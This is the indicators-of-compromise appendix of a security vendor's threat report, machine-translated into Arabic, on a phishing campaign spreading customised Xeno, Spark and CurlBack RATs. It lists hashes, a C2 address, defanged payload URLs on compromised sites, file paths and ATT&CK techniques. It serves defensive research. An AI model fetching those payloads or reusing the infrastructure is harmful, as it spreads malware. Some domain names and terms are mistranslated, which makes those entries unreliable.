8ceeeec0e33026114f028cbb006cb7fc تحديث السياسة لهذه الدورة التدريبية.txt
1d65fa0457a9917809660fff782689fe NDC65-Updated-Schedule.zip
7637cbfa99110fe8e1074e7ead66710e NDC65-Updated-Schedule.pdf.lnk
32a44a8f7b722b078b647e82cb9e85cf NDC65-Updated-Schedule.hta
a2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll
b45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf
83ce6ee6ad09a466eb96f347a8b0dc20 وثيقة.pdf
cf6681cf1f765edb6cae81eeed389f78 suport.exe
c952aca2036d6646c0cffde9e6f22775 DevApp.exe (Xeno RAT مخصص)

لينكس

b5e71ff3932c5ef6319b7ca70f7ba8da 2024-العطلات-الوطنية-RH-PER_N-1.zip
0a67bfda993152c93a212087677f9b60 الأعياد الوطنية 2024-RH-PER_N-1․pdf
e165114280204c39e99cf0c650477bf8 clinsixfer.elf (RAT Spark مخصص)

C2

79.141.161 [.] 58: 1256 زينو رات
التحديثات.widgetservicecenter[.]com

التحديثات.biossysinternal[.]com

CurlBack RAT

عناوين URL

hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/
hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf
hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/
hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/
hxxps://updates.widgetservicecenter.com/antivmcommand
hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip
hxxps://modspaceinterior.com/wp-content/upgrade/01/
hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta
hxxps://egovservice.in/vvcmcrts/
hxxps://egovservice.in/vvcmc_safety_tank/
hxxps://egovservice.in/testformonline/test_form
hxxps://egovservice.in/payroll_vvcmc/
hxxps://egovservice.in/pakora/egovservice.in/
hxxps://egovservice.in/dssrts/
hxxps://egovservice.in/cmc/
hxxps://egovservice.in/vvcmcrtsballarpur72/
hxxps://egovservice.in/dss/
hxxps://egovservice.in/130521/set_authority/
hxxps://egovservice.in/130521/13/

مجالات التدريج

modspaceinterior[.]com
drjagrutichavan[.]com
nhp.mowr[.]gov[.]in
pmshriggssssiwan[.]in
بوابات التعليم[.]في
خدمة الحكومة الإلكترونية[.]في
gadchiroli.egovservice[.]in

pen.egovservice[.]in

cpcontacts.egovservice[.]in

cpanel.egovservice[.]in

webdisk.egovservice[.]in

cpcalendars.egovservice[.]in

webmail.egovservice[.]in

www.dss.egovservice[.]in

www.cmc.egovservice[.]in

cmc.egovservice[.]in

dss.egovservice[.]in

mail.egovservice[.]in

www.egovservice[.]in

www.pakola.egovservice[.]in

pakola.egovservice[.]in

www.pakora.egovservice[.]in

pakora.egovservice[.]in

المضيف وقاعدة بيانات البروتين

C:\ProgramData\LavaSoft\Sampeose.dll
C:\ProgramData\LavaSoft\DUI70.dll
C:\ProgramData\LavaSoft\girbesre.exe
C:\ProgramData\LavaSoft\svnides.hta
C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
C:\Users\Public\Downloads\Document.pdf
C:\Users\Public\Downloads\suport.exe
E:\finalRnd\Myapp\obj\Debug\Myapp.pdb

الأفخاخ

320bc4426f4f152d009b6379b5257c78 الأعياد الوطنية 2024-RH-PER_N-1.pdf
9de50f9357187b623b06fc051e3cac4f إرشادات الأمان.pdf
c9c98cf1624ec4717916414922f196be NDC65-تحديث-الجدول.pdf
83ce6ee6ad09a466eb96f347a8b0dc20 وثيقة.pdf

MITER ATT & CK

TTP الاسم
استطلاع  
T1589.002 جمع معلومات هوية الضحية: عناوين البريد الإلكتروني
تنمية الموارد  
T1583.001

T1584.001

T1587.001

T1588.001

T1588.002

T1608.001

T1608.005

T1585.002

T1586.002

اكتساب البنية التحتية: المجالات

البنية التحتية للاختراق: المجالات

تطوير القدرات: البرامج الضارة

الحصول على القدرات: البرامج الضارة

الحصول على القدرات: الأداة

قدرات المرحلة: تحميل البرامج الضارة

قدرات المرحلة: ربط الهدف

إنشاء حسابات: حسابات البريد الإلكتروني

حسابات الاختراق: حسابات البريد الإلكتروني

الوصول الأولي
T1566.002 التصيد الاحتيالي: رابط التصيد الاحتيالي
التنفيذ
T1106

T1129

T1059

T1047

T1204.001

T1204.002

API الأصلي

الوحدات المشتركة

مترجم الأوامر والبرمجة

ويندوز إدارة الأجهزة

تنفيذ المستخدم: ارتباط ضار

تنفيذ المستخدم: ملف ضار

إصرار
T1053.003

T1547.001

المهمة/الوظيفة المجدولة: Cron

مفاتيح تشغيل التسجيل / مجلد بدء التشغيل

التصعيد امتياز
T1548.002 آلية التحكم في الارتفاع عن طريق إساءة الاستخدام: تجاوز التحكم في حساب المستخدم
التهرب الدفاعي
T1036.005

T1036.007

T1140

T1218.005

T1574.002

T1027

T1620

التنكر: تطابق الاسم الشرعي أو الموقع

التنكر: امتداد الملف المزدوج

فك تشفير / فك تشفير الملفات أو المعلومات

تنفيذ الوكيل الثنائي للنظام: Mshta

تدفق تنفيذ الاختراق: تحميل جانبي لـ DLL

ملفات أو معلومات مبهمة

تحميل رمز عاكس

الاكتشاف
T1012

T1016

T1033

T1057

T1082

T1083

T1518.001

سجل الاستعلام

اكتشاف تكوين شبكة النظام

مالك النظام / اكتشاف المستخدم

اكتشاف العملية

اكتشاف معلومات النظام

اكتشاف الملفات والدليل

اكتشاف البرامج: اكتشاف برامج الأمان

التشكيلات
T1005

T1056.001

T1123

T1113

T1560.001

البيانات من النظام المحلي

التقاط الإدخال: Keylogging

التقاط الصوت

القبض على الشاشة

أرشفة البيانات المجمعة: أرشفة عبر الأداة المساعدة

القيادة والتحكم
T1105

T1571

نقل أداة الدخول

منفذ غير قياسي

exfiltration
T1041 تسلل عبر قناة C2

 

المؤلف:

ساثويك رام براكي

كارتيك كومار جيفاني

 الصفحة السابقةأهمية قانون DPDP لقطاع الخدمات المصرفية والمالية والتأمين
الصفحة التالية  EDR مقابل XDR: فهم الاختلافات واختيار الخيار المناسب
ساثويك رام براكي

نبذة عن ساثويك رام براكي

يعمل ساثويك رام براكي كباحث أمني في مختبرات الأمن بشركة كويك هيل. وتشمل مجالات تركيزه ما يلي: Threat Intelاليقظة، ومطاردة التهديدات، والكتابة عن...

مقالات بقلم ساثويك رام براكي »

منشورات ذات علاقة

  • سارق جديد في الأفق

    21 آذار، 2025
  • هجمات التصيد الاحتيالي عبر رمز الاستجابة السريعة (Quishing): كيفية اكتشافها ومنعها

    18 آذار، 2025
  • كشف حملة GrassCall: المتسللون وراء عمليات الاحتيال الإلكتروني في مجال التوظيف

    6 آذار، 2025
المؤلفون المميزون
  • Seqrite
    Seqrite

    Seqrite هي شركة رائدة في مجال توفير حلول الأمن السيبراني للمؤسسات. مع التركيز على...

    قراءة المزيد من المقالات التي كتبها Seqrite
  • جوتي كارليكار
    جوتي كارليكار

    أنا كاتب متعطش أستمتع بصياغة محتوى حول التقنيات الناشئة و...

    اقرأ المزيد من المقالات التي كتبها جيوتي كارليكار
  • بينيش ب
    بينيش ب

    أنا شغوفٌ بالأمن السيبراني وكاتبٌ مُتفانٍ. لديّ موهبةٌ...

    اقرأ المزيد من مقالات بينيش ب.
  • سانجاي كاتكار
    سانجاي كاتكار

    سانجاي كاتكار هو المدير الإداري المشترك لشركة Quick Heal Technologies...

    اقرأ المزيد من مقالات سانجاي كاتكار
المواضيع
عرضة (25) هجوم إلكتروني (36) الهجمات الالكترونية (58) هجوم إلكتروني (16) هجمات الكترونية (15) الأمن السيبراني (342) الأمن الإلكتروني (34) التهديد السيبراني (33) تهديدات الإنترنت (51) البيانات الاختراق (56) خروقات البيانات (29) فقدان البيانات (28) منع فقدان البيانات (34) data privacy (16) حماية البيانات (34) أمن البيانات (19) DLP (50) DPDP (14) قانون حماية البيانات الشخصية (17) التشفير (16) أمن نقطة النهاية (113) أمن المؤسسة (20) استغلال (13) GDPR (14) البرمجيات الخبيثة (76) تحليل البرمجيات الخبيثة (14) هجوم البرمجيات الخبيثة (23) MDM (27) Microsoft (15) MITER ATT & CK (14) أمن الشبكة (26) التصيد (30) الفدية (69) هجوم الفدية (31) رانسوموار الهجمات (31) حماية ransomware (17) Seqrite (41) Seqrite التشفير (27) Seqrite ربحية السهم (33) Seqrite الخدمات (16) كشف التهديد (14) Threat Intelليغنس (22) UTM (34) الثغرة الأمنية (16) الثقة صفر (13)
Seqrite مختبرات

مزود حلول أمن تكنولوجيا المعلومات الرائد للمؤسسات يعمل على تبسيط أمان نقاط النهاية والبيانات والشبكات من خلال أفضل حلول الوقاية من التهديدات واكتشافها والاستجابة لها في جميع أنحاء العالم.

اقرأ المزيد عن Seqrite

تابعنا:

اشترك في نشرتنا الإخبارية

ابق على اطلاع بأحدث اتجاهات ورؤى الأمن السيبراني.

تحميل
المنتجات والخدمات
  • سحابة
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • على بريم
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • المنظومة
  • Malware Analysis Platform
  • الأعمال الصغيرة
  • SOHO Total Edition
  • الخدمات
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • الأمن السيبراني و Data Privacy الاجتماعي
المصادر
  • مدونات
  • هيتيبابرز
  • البيانات
  • تقارير التهديد
  • كتيبات
  • وجهة نظر
  • فهم Data Privacy
  • حوارات DPDP
  • السياسة والامتثال
  • اتفاقية ترخيص المستخدم النهائي
  • جو ديب ايه اي
  • SIA
  • ساعة الخصوصية
اتصل بنا
  • المكاتب المسجلة
  • دعونا نتحدث عن الأمن السيبراني
الدعم
  • الدعم الفني
  • لتحميل البرامج
  • التحديث دون اتصال بالإنترنت
  • ترقيات البرامج الثابتة
  • ترقيات
  • وثائق المنتج
معلومات عنا
  • من نحن Seqrite
  • القيادة
  • الجوائز والتكريم
  • الأخبار
شريك
  • برنامج شريك
  • تحديد الشريك
  • إشترك معنا
  • Seqrite الشهادات

© 2026 شركة كويك هيل تكنولوجيز المحدودة.

خريطة الموقع سياسات الخصوصية ملاحظات قانونية سياسات ملفات تعريف الارتباط شروط الاستخدام